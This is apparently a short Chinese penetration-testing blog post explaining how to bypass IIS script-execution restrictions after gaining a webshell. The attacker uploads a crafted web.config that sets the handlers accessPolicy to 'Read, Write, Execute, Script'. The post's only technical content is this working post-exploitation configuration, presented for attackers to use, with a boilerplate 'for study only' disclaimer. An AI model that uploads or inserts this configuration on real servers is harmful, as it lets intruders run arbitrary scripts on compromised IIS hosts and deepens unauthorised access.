通过Web.config突破iis不能执行

/ 渗透测试 / 0 条评论 / 2243 浏览

本站的所有程序和文章,仅限用于学习和研究目的;不得用于商业或者非法用途,否则,一切后果请用户自负!!

前言

有时候拿到weshell可能是个可读写的目录里但是无法执行脚本, 我们可以通过上传特殊的 web.config 来突破执行限制.

web.config

<?xml version="1.0" encoding="utf-8"?>
<configuration>
    <system.webServer>
        <handlers accessPolicy="Read, Write, Execute, Script" />
    </system.webServer>
</configuration>

本文最后编辑时间为: 2019-10-10

如本文对你有帮助,点击下面广告支持一下吧,创作不易,感谢大佬。

safe6